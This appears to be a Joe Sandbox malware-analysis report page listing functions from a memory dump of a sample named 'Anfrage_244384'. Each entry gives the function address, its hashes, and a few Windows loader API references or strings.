Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @[v4@[v4
API String ID: 0-1201398778
Opcode ID: e6d9e8fce1ca0a66b02817642c3bc7d2d980f00eab3f122e9384dc886d5032a6
Instruction ID: 05bea5f4be094f631ffbc260665331901d487dc75b0b0653d209f3be7f193c8b
Opcode Fuzzy Hash: e6d9e8fce1ca0a66b02817642c3bc7d2d980f00eab3f122e9384dc886d5032a6
Instruction Fuzzy Hash: D1327AB5E00219DBDF14CFA8C890BEEBBB5FF94B54F14002DE805AB290E775A901CB91

Function 347431E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 34743356

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: CallFilterFunc@8
String ID:
API String ID: 4062629308-0
Opcode ID: a3bdf2084918107a7f61f3cb105cb7e8fcf8b4830391471f158a3ea68ab463e0
Instruction ID: 2078ffbe74d4f7384fc38ced9984d6eca95f9b2d7934f9c45ced54015c27379d
Opcode Fuzzy Hash: a3bdf2084918107a7f61f3cb105cb7e8fcf8b4830391471f158a3ea68ab463e0
Instruction Fuzzy Hash: 7DC115B5A017198FDB60CF1AC9846A9FBF5FB88314F9081AED54DAB750D734AA81CF40

Function 34671131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34671233

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 12eeba736247d36750766b0157c6e2aca194d80ea9eb7ebac922aab568707cc7
Instruction ID: 0fb950d3977decbcba706add484cb09394c5f066c5ebd5eb96b23b000f7991f0
Opcode Fuzzy Hash: 12eeba736247d36750766b0157c6e2aca194d80ea9eb7ebac922aab568707cc7
Instruction Fuzzy Hash: C9B101B56083408FD354CF28C480A5ABBF5FF88304F548A6EE999DB352D731E985CB86

Function 34677370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66b25004a63c6a69dc729ff63305eb821a645cad2a191f966ea17377394ae5fe
Instruction ID: 0f9b292ddcfe8cc35911b631432651f12895d950b8a77833a7c0d4050c1db217
Opcode Fuzzy Hash: 66b25004a63c6a69dc729ff63305eb821a645cad2a191f966ea17377394ae5fe
Instruction Fuzzy Hash: 21A18A75608342CFE310CF28C480A1ABBE6FF98345F20492EE5859B354EB70F945CB96

Function 34677703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7f72a38275c2cec5417cdf93238e7d36bb23e78cd003efa135c6aebb8cb3a54
Instruction ID: 690ee9bb13b82789b8ce5505fe12b5312a8acb1a78cf1df98c6dd3d16396dbb0
Opcode Fuzzy Hash: c7f72a38275c2cec5417cdf93238e7d36bb23e78cd003efa135c6aebb8cb3a54
Instruction Fuzzy Hash: 39613D75E00606EFEB08DFB8C480A9DFBB5FF98240F24826AD419A7350DB34A941CBD5

Function 346AF603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c7f60be02f44cc4d14e48df8a0d26697985f7d8034cdd93e6c00aa81bd5a8a
Instruction ID: 7cd93ca355aebfcd9ff0ace086091f933d565af89c579c2050b7da717ed92709
Opcode Fuzzy Hash: d7c7f60be02f44cc4d14e48df8a0d26697985f7d8034cdd93e6c00aa81bd5a8a
Instruction Fuzzy Hash: 3C4138B4900688EFDB14CFAAC880AEDBBF9FF48344F54416ED899A7211DB349901CF65

Function 3466B480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3466B50C

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b31c54579f56d3ec8472bff3e1da2f298a4d75c30b60bc5f3c55147b40026ff9
Instruction ID: ea59337ad4d5b55fce2bf916d5ddc98e94ce2ff470a0a9980f856f6b1925d65c
Opcode Fuzzy Hash: b31c54579f56d3ec8472bff3e1da2f298a4d75c30b60bc5f3c55147b40026ff9
Instruction Fuzzy Hash: 86313372600314EFD311CF14C880A9A77AAFF84BA8F50426EED469B291DB35ED42CBD5

Function 346757C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34675842

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6bb44140032fbf1dc7176c343f1ac2aa05a06c62162da735574ad56e1233c87a
Instruction ID: 5cb191b656c8b5f1937dd054980f121f2ece6dc2575ab422a1cafb69fb797d1b
Opcode Fuzzy Hash: 6bb44140032fbf1dc7176c343f1ac2aa05a06c62162da735574ad56e1233c87a
Instruction Fuzzy Hash: F331BC39715A06FFEB818F24CA50A99BBA6FF88344F54506AE80087F50DB35F830CB85

Function 34673616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346736A1

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4b1b7623130ee789e5a295fe2822733bfdd954a8f0862cf4a550ac43927bca82
Instruction ID: 09761187bab3e9a2f9f8826529843031e2f15c7e1893e9267b639230dfca0891
Opcode Fuzzy Hash: 4b1b7623130ee789e5a295fe2822733bfdd954a8f0862cf4a550ac43927bca82
Instruction Fuzzy Hash: E621EA752053509FE7219F04C984B5ABFAAFFC1B24F81046DE9461BB60CA35E884CF92

Function 34681CC7 Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d294ea0565b2f4e6f381aadfacd161edc8511e5e117b13705a115af0958bb9
Instruction ID: 4b55c49cd791570329aa81ac6e0e83c8a85831d08646b11191ff012b313ee963
Opcode Fuzzy Hash: 65d294ea0565b2f4e6f381aadfacd161edc8511e5e117b13705a115af0958bb9
Instruction Fuzzy Hash: CD21A175701B00DFE721CF28C850B86B7E9FF98714F14496EE592877A0EBB4A802CB80

Function 346692FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34669325

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: d500a8681b02b123741cd1ac4e4aae30c7ea2cc00dbd1333eb3fee4c6991d4d3
Instruction ID: 818588a2412dcec7323bf8f8252b7bef5dd66f312b8ffb30d745e5ee6f722080
Opcode Fuzzy Hash: d500a8681b02b123741cd1ac4e4aae30c7ea2cc00dbd1333eb3fee4c6991d4d3
Instruction Fuzzy Hash: ECF0FA72200340AFE3319F09CC04F8ABBEDEF94B04F18011DA946A30A0CAA5A909CAA4

Function 3467973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON

Download Yara Rule

Strings

@, xrefs: 346797F3

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction ID: c7a1d3813e01396cc0412f987cc62953d4d58cb58686083c39ef416b4a3fb528
Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
Instruction Fuzzy Hash: AD6147B5D00219EFEF118F95C840B9EBBF8EF85754F10466AE811A7290DB748A08CFA1

Function 346F3CDB Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

CWDIllegalInDLLSearch, xrefs: 346F3D08

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: CWDIllegalInDLLSearch
API String ID: 0-473384322
Opcode ID: f49f69e72e1ae0ba1556d5aa0307c14379c63cb1af32248a19e59ec7d96c36f7
Instruction ID: 08bfed9751fb25811902430e667edbb93b81dc8e19cbb5cf261313ab2a893963
Opcode Fuzzy Hash: f49f69e72e1ae0ba1556d5aa0307c14379c63cb1af32248a19e59ec7d96c36f7
Instruction Fuzzy Hash: A451B1B5A087029FE711CE14CC81B5AB7E9EF94760F400A2EF9A5D7250D732DD88CB96

Function 346FF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 346FF867

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction ID: 800a09221986e59bcaf7bff93ac4ec5ced2742038a4964d8dc23fdb9e1e8ef5c
Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
Instruction Fuzzy Hash: 6D518BB2604305AFE7158F54CC40F5AB7ECFB94758F40092EB594A7690DBB2ED04CB96

Function 3472B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 3472B28F

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 7ebe3ae7c08d826b0b4b1d6ad2d2ff00a9e9fc5a9c3a8ad06ada866a6b4af831
Instruction ID: ddd31a9f4b9ecc20b8a6be7ef67f661df6593d77d9499bc8b2c975efd9a658f1
Opcode Fuzzy Hash: 7ebe3ae7c08d826b0b4b1d6ad2d2ff00a9e9fc5a9c3a8ad06ada866a6b4af831
Instruction Fuzzy Hash: 4C41AD76A00619EFEB118EA5C844AEFB3BAEF44750F01416AE811EB351DA34DE40C7A4

Function 346F97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 346F9870

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: f56f1c00e1339a05bd207ba64259a645f06e779acd813467c9320fabdbc978b6
Instruction ID: 0285ec2966171ba00c3ee98fa37141666d9da69916338d6e1fcdcb784d615e59
Opcode Fuzzy Hash: f56f1c00e1339a05bd207ba64259a645f06e779acd813467c9320fabdbc978b6
Instruction Fuzzy Hash: 0E3184B5600301AFE7148F29DC60A6677E6EB58354FD0487AE585DF381E6328C858F55

Function 346ABC3B Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 346ABC51

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: LdrpInitializeProcess
API String ID: 0-2689506271
Opcode ID: 19ae37b00a924951435474224f1d4f9c5d143c009308a2b2f2216381a53ba5b5
Instruction ID: c496c8fbde4251b176b96c7193b6ffbf9d13690996321c3bb88db4e3086ee1b0
Opcode Fuzzy Hash: 19ae37b00a924951435474224f1d4f9c5d143c009308a2b2f2216381a53ba5b5
Instruction Fuzzy Hash: 3341A5B2515304EFE311CE90CA44EEBB7EDEB84714F44492EF2A296140D7B4E949CF6A

Function 346A7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 346E4622

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 9965dddc2034d4ea44b5683dfc4f35936626405275fa39deb2128d0f210bf0ec
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: A14181B9A00A15EFEB15CF54C490BBEB7B5EF94742F00445AE94597240DF30DD81CBA2

Function 346A36EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Flst, xrefs: 346A3731

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: fd5be245fc8cadeeb4c6316254e09b27103d67ffc97ad1f09c722192549d692f
Instruction ID: 833951ec5ae80d74c638538699e7e4dec01176c17c0f47df7b54a0457a690fff
Opcode Fuzzy Hash: fd5be245fc8cadeeb4c6316254e09b27103d67ffc97ad1f09c722192549d692f
Instruction Fuzzy Hash: CA41A7F5205701DFE304CF18C580A16FBE5EB99714F50816EE8498F281EB31DD86CB9A

Function 34669730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

L4CwL4Cw, xrefs: 346697A7

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: L4CwL4Cw
API String ID: 3446177414-1654103815
Opcode ID: 609e945a18ae3192d7fe5ba3d15ae0fbf7e90dc65138b3cd223a7dd4d9f1081a
Instruction ID: 03b06a7f5fecb34f915e81e1f3b25f5ee9f0db4d2f6246760c89555e3ea27490
Opcode Fuzzy Hash: 609e945a18ae3192d7fe5ba3d15ae0fbf7e90dc65138b3cd223a7dd4d9f1081a
Instruction Fuzzy Hash: 8D218376A00714EFE3218F58C800B5ABBB5FB84B68F11046DAD56AB751DB38DC09CF95

Function 346AD530 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

gv4, xrefs: 346AD5DF, 346AD5E3

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: gv4
API String ID: 0-1041692182
Opcode ID: 046302241cc84a4ff7e76e23f3a7665e5da098899f05d0d6892bccff35a7995f
Instruction ID: d8187b3d08a3cea16ca970ab1589866a7e9dcc38673512246cf363763567fa66
Opcode Fuzzy Hash: 046302241cc84a4ff7e76e23f3a7665e5da098899f05d0d6892bccff35a7995f
Instruction Fuzzy Hash: 8121E2F1605700DFE721DF68CA40B5677EEEB64658F40082AF945AB661EB38DC40C7EA

Function 34675096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 346750BF

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 7673215ba39e7b895cbef7ced4502af27a4627d9d577e2efbb93882638f25f2a
Instruction ID: b827abb1aaf39fc12e25e1caef8e14523e616ec4861068a0255f4496fe9e51f2
Opcode Fuzzy Hash: 7673215ba39e7b895cbef7ced4502af27a4627d9d577e2efbb93882638f25f2a
Instruction Fuzzy Hash: 651190747087068BF7945D1988706167B99EFA62A8F3085AEE460CBB90DA72D8418782

Function 346F106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 346F10F7

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 139a1b3116e1a0c80c7638a3f466e643f05293a4d2faf49bc6089d8bc0ae960a
Instruction ID: f114abf1063dd97b1d447d745d265448220afcd8537c930d32e8a369e32ec540
Opcode Fuzzy Hash: 139a1b3116e1a0c80c7638a3f466e643f05293a4d2faf49bc6089d8bc0ae960a
Instruction Fuzzy Hash: 3021F3B15083449FD310CF1AC845A9BFBE8EBD5B50F004A1EB99096250D7B6D805CF96

Function 34667330 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

svchost.exe, xrefs: 34667367

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: svchost.exe
API String ID: 0-3106260013
Opcode ID: 2afcc3ebf600ad6c83ce8a1a3c4a31773ff1de0baad870f981e14274e47b5702
Instruction ID: dda896936c0f854df9b1abef12fa03c433cd7c469d1ab66ba032a6c3cf540c1c
Opcode Fuzzy Hash: 2afcc3ebf600ad6c83ce8a1a3c4a31773ff1de0baad870f981e14274e47b5702
Instruction Fuzzy Hash: 1C11A075600714DFE711CF69C841B9B77E8EB44349F014429E986DB210D739EC008BA1

Function 346C739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b824aea03ad264890c1f400683a88752f9e78fb2e98bb8e0649fe7ae237a3290
Instruction ID: 40570553235bdf42408891930694aabaeb77395cb3a1b0d8f01e95955fe31303
Opcode Fuzzy Hash: b824aea03ad264890c1f400683a88752f9e78fb2e98bb8e0649fe7ae237a3290
Instruction Fuzzy Hash: A342CFB5A00616CFEB08CF59C880AAEB7B6FF98355F54816DD556AB340DB34EC42CB90

Function 347316CC Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
